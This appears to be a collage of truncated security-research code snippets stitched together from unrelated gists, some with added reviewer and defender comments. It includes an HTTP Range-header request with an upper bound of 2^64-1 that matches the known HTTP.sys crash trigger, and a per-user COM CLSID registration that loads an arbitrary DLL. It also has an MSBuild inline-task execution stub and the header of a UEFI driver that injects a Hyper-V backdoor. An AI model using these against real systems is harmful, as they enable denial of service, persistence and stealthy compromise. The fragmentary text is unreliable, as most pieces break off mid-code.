Stop! This text is only interesting for you if you...
- Like popping alerts in weird situations
- Miss CSS expressions as much as we do
- Have an unhealthy obsession for markup porn
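# Clone every repository of the "twitter" GitHub organisation over SSH.
#
# - The URL is quoted so the shell never treats '?' as a glob character.
# - curl -f turns an HTTP error into a non-zero exit instead of piping an
#   error body into ruby; -S still prints the reason while -s hides progress.
# - ssh_url comes from a remote API response, so it is passed to git as a
#   separate argument (no shell involved) and after "--" so a value that
#   starts with '-' cannot be read as a git option.
# - JSON.parse is used instead of JSON.load, which the json library documents
#   as intended for trusted input only.
# - -rjson replaces the -rubygems / require "json" pair; -rubygems is not
#   loadable on current Ruby releases.
# NOTE: GitHub caps per_page at 100, so this fetches one page only; an
# organisation with more repositories needs pagination.
curl -fsS 'https://api.github.com/orgs/twitter/repos?per_page=200' |
  ruby -rjson -e 'JSON.parse(STDIN.read).each { |repo| system("git", "clone", "--", repo["ssh_url"]) }'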
Windows Registry Editor Version 5.00 | |
; Registers an in-process COM server for the current user only: both keys live
; under HKEY_CURRENT_USER\Software\Classes, not HKEY_LOCAL_MACHINE, so importing
; this file does not need administrative rights.
; Defender note: a per-user CLSID entry is resolved ahead of a machine-wide entry
; with the same CLSID for that user, so new or changed values under
; HKCU\Software\Classes\CLSID\*\InProcServer32 are worth monitoring.
[HKEY_CURRENT_USER\Software\Classes\CLSID\{97d47d56-3777-49fb-8e8f-90d7e30e1a1e}] | |
[HKEY_CURRENT_USER\Software\Classes\CLSID\{97d47d56-3777-49fb-8e8f-90d7e30e1a1e}\InProcServer32] | |
; The default value is the DLL that gets loaded for this CLSID. Here it is a Debug
; build inside a Visual Studio project folder under a user profile.
; NOTE(review): no ThreadingModel value is set in the visible lines - confirm that is intended.
@="C:\\Users\\Administrator\\Documents\\Visual Studio 2015\\Projects\\ClassLibrary2\\ClassLibrary2\\bin\\x86\\Debug\\ClassLibrary2.dll" |
# Build a code integrity policy from a point-in-time snapshot of C:\ and
# install it as the system policy file (SIPolicy.p7b).

# Create a client-accessible volume shadow copy of C:\ and look up the new
# Win32_ShadowCopy instance by the ShadowID that Create() returned.
$snapshotResult = (Get-WmiObject -List Win32_ShadowCopy).Create("C:\", "ClientAccessible")
$snapshot = Get-WmiObject Win32_ShadowCopy | Where-Object { $_.ID -eq $snapshotResult.ShadowID }

# Expose the snapshot as C:\scpy through a directory symlink; the device path
# gets a trailing backslash appended before it is handed to mklink.
$snapshotRoot = $snapshot.DeviceObject + "\"
cmd /c mklink /d C:\scpy "$snapshotRoot"

# Scan the snapshot and write rules at RootCertificate level, including
# user-mode executables (-UserPEs).
# NOTE(review): at this level every root certificate that signed a file found in
# the scan ends up trusted, so whatever is already on the scanned volume becomes
# allowed - presumably this should only be run on a known-clean reference machine.
New-CIPolicy -Level RootCertificate -FilePath C:\BasePolicy.xml -ScanPath C:\scpy -UserPEs

# Release the snapshot, then remove the link that pointed at it.
$snapshot.Delete()
Remove-Item -Path C:\scpy -Force

# NOTE(review): rule option 3 is documented as "Enabled:Audit Mode". Setting it
# without -Delete leaves the policy in audit mode, which logs violations rather
# than blocking them - confirm against the ConfigCI documentation before relying
# on this policy for enforcement.
Set-RuleOption -Option 3 -FilePath C:\BasePolicy.xml

# Convert the XML policy to its binary form and move it into the CodeIntegrity directory.
ConvertFrom-CIPolicy C:\BasePolicy.xml C:\BasePolicy.bin
Move-Item C:\BasePolicy.bin c:\Windows\System32\CodeIntegrity\SIPolicy.p7b -Force
# Sends one request for the local IIS default page (127.0.0.1/iisstart.htm) with a
# Range header of bytes=18-18446744073709551615; the upper bound is 2^64-1, the
# largest unsigned 64-bit value. -com is presumably the abbreviated -Command parameter.
# Defender note: a Range end at or near 2^64-1 does not occur in normal client
# traffic, so it is a useful pattern to alert on in web server and IDS logs.
# NOTE(review): .close() is called on the WebRequest object; the response returned
# by GetResponse() is not stored, so it is never closed explicitly.
powershell -com {$wr=[Net.WebRequest]::Create('http://127.0.0.1/iisstart.htm');$wr.AddRange('bytes',18,18446744073709551615);$wr.GetResponse();$wr.close()} |
/* http://redd.it/2zna5q | |
* Fibonacci example: | |
* (1) (2) + | |
* 0:0 | |
* 1:1 | |
* 20 | |
*/ | |
#define _BSD_SOURCE // MAP_ANONYMOUS | |
#include <stdio.h> | |
#include <stdlib.h> |
/*
*********************************************************************
Part of UEFI DXE driver code that injects Hyper-V VM exit handler
backdoor into the Device Guard enabled Windows 10 Enterprise.
Execution starts from new_ExitBootServices() -- a hook handler
for EFI_BOOT_SERVICES.ExitBootServices(), which is called by
winload!OslFwpKernelSetupPhase1(). After the DXE phase exits, winload.efi
transfers execution to the previously loaded Hyper-V kernel (hvix64.sys)
# Author: Matthew Graeber (@mattifestation) | |
# Load dnlib with Add-Type first | |
# dnlib can be obtained here: https://github.com/0xd4d/dnlib | |
# Example: ls C:\ -Recurse | Get-AssemblyLoadReference | |
filter Get-AssemblyLoadReference { | |
param ( | |
[Parameter(Mandatory = $True, ValueFromPipelineByPropertyName = $True)] | |
[Alias('FullName')] | |
[String] | |
[ValidateNotNullOrEmpty()] |
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> | |
<!-- This inline task executes c# code. --> | |
<!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe pshell.xml --> | |
<!-- Author: Casey Smith, Twitter: @subTee --> | |
<!-- License: BSD 3-Clause --> | |
<PropertyGroup> | |
<FunctionName Condition="'$(FunctionName)' == ''">None</FunctionName> | |
<Cmd Condition="'$(Cmd)' == ''">None</Cmd> | |
</PropertyGroup> | |
<Target Name="Hello"> |
function Get-InjectedThread | |
{ | |
<# | |
.SYNOPSIS | |
Looks for threads that were created as a result of code injection. | |
.DESCRIPTION | |